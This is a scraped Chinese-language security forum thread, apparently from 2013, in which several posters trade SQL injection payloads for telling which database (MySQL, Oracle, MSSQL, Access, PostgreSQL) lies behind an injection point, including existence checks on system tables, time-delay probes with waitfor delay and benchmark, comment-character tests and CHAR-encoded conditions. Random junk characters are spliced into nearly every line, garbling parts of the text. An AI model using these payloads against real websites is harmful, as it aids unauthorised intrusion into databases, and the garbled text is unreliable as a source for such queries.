一个注射点如何最快速确认是什么类型数据库0 N& F, m, ^6 s$ W/ F* g
xsser (十根阳具有长短!!) | 2013-02-05 12:36
) d- z' [/ c# u( q! x假设这么一个注射点:4 C. X# `1 t/ ]$ I( \
show.html?id=2
9 _7 I/ D) v! F' Z& w* _9 emysql:id=2 and version()>0
. w: B* j( N2 b& g( koracle:id=2 and '1'||'1'='11
: x$ P3 X/ ^4 V其他的欢迎补充7 F7 p! q2 R: ^# @8 b
1#1 S- z& m* Q$ R: ^5 g
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47) _7 c, }' {: I: S' C
Access:( ?% G5 g0 j q M- s# v3 r/ k
aNd aSc(cHr(97))=97
+ Z0 u, L2 M! O1 O% m& jand exists(select id from MSysAccessObjects)
/ W7 I: z* A, X$ r! LSQL Server:
; i) O+ D* }- g! @; W) ?0 jand exists(select id from sysobjects)
/ l$ L6 z+ U& @7 T/ kand length(user)>02 f+ K. S8 M" m+ C7 G
MySQL:
$ a3 L$ D! T7 i+ X4 Iand length(user())>07 f- y# O3 g) _* H5 h' R' j9 e* a1 l
2#
$ y6 n) ^3 r) g0 b9 H% Xxsser (十根阳具有长短!!) | 2013-02-05 12:485 y/ z% o" f9 v1 G0 v
@upload 如果这些都不是呢…8 O- q' X# p9 O: `
3#* R$ |4 c# }+ q; z4 f
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
0 _0 H0 }# r6 f9 _@xsser 不快速的,延时注入3 p- R* s* ?0 g+ Z1 K
不知道这样写对不对7 U% B1 ^# I1 _) F4 P# s
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3') C7 |8 u# m" p; o0 t
mysql:id=2 and select benchmark(1e8,current_date());5 [) Q0 L2 R5 j z4 Q5 A
4#5 ?, T4 C& c4 D3 W; F
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10* j- d" e5 Z7 X) i8 @0 v
最快的貌似是看报错信息
* z' M, d3 }. E# S7 z& [' h- ^6 Voracle error0 C X* A* w0 `
mssql error$ f! j9 f6 Y$ l4 Z+ o/ i
mysql error& G* c! Z- X. B- q
5#
$ S! k9 G9 l3 ZNimda (你们都是坏银~) | 2013-02-05 13:142 U/ w0 f7 ^: x
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)" c" |: N3 u5 X; H8 Q* L
6#
, n4 O, r" m# \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:211 U. a; `$ s l# ]7 C' R9 i
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
/ I8 A+ A& ?6 Z* c( |“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
6 d: G i i. F“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
, F8 `) ^$ [4 f& W4 S) [7#
$ F% |% a# A$ G. H. o+ s_Evil (HackEnd) | 2013-02-05 13:33% f0 x8 I( B1 d, {. }" w5 h: z
PostgreSQL+ G* s; M2 I* `; d- {
8#& h* g u8 ~. X% }6 ~
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
1 {& k- I ?/ }切换编码 and 1=18 h) z& w& a) b
oracle:( L; ^ u4 ^" v$ q7 M
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49), ^0 g& `) I0 P$ d7 M. {
mssql:9 i% o- t. H' g
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)9 [ b* z: H2 J
mysql:
5 a/ x) f8 U& ]- YCHAR(97, 110, 100, 32, 49, 61, 49)' O) z( y6 S0 i, k( C
9#
) c+ @/ P+ ]$ ]; E: L# b4 [! \xsser (十根阳具有长短!!) | 2013-02-05 14:31
7 K$ j) F2 m5 }@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?% D4 ~8 r6 K% b; n# p! r
10#
' y+ [7 U& L q% u# C @9 mupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46: D% O# S, l' G% ~ O
@xsser 是奇葩数据库类型的么?5 @5 l8 H6 W6 B$ @) d
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:/ Z2 q: Q) r8 n& V, v2 J9 X. F
1.是否可以使用特定的函数来判断,该数据库特有的
2 y# u. o1 p$ L$ z1 C: @2 B1 H9 V9 A3 V2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
+ H8 T) Z, f; T! |3.是否可以编码查询
; D1 v0 t9 K9 c) F4.是否显可以利用错信息, ?$ A3 d8 h( p) y1 P: Q8 t) @; Z0 D
5.是否存在数据库某些特性辅助判断
" f0 p3 q! D# ]个人见解 M+ Q' h, c3 y2 [
11#7 W0 w; P3 k# X) X# o8 d
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55/ p9 G* B7 Y# v. t' {6 @+ m0 g
已收藏,mssql可以直接看到错误提示的吧~
7 A7 E2 [. L' G12#
8 O2 H6 M! X& R8 n- R/ kPasser_by | 2013-02-05 15:09+ m% l i9 p/ q0 J q. c: S
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
0 h/ V& B5 E: ~( v' qfrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对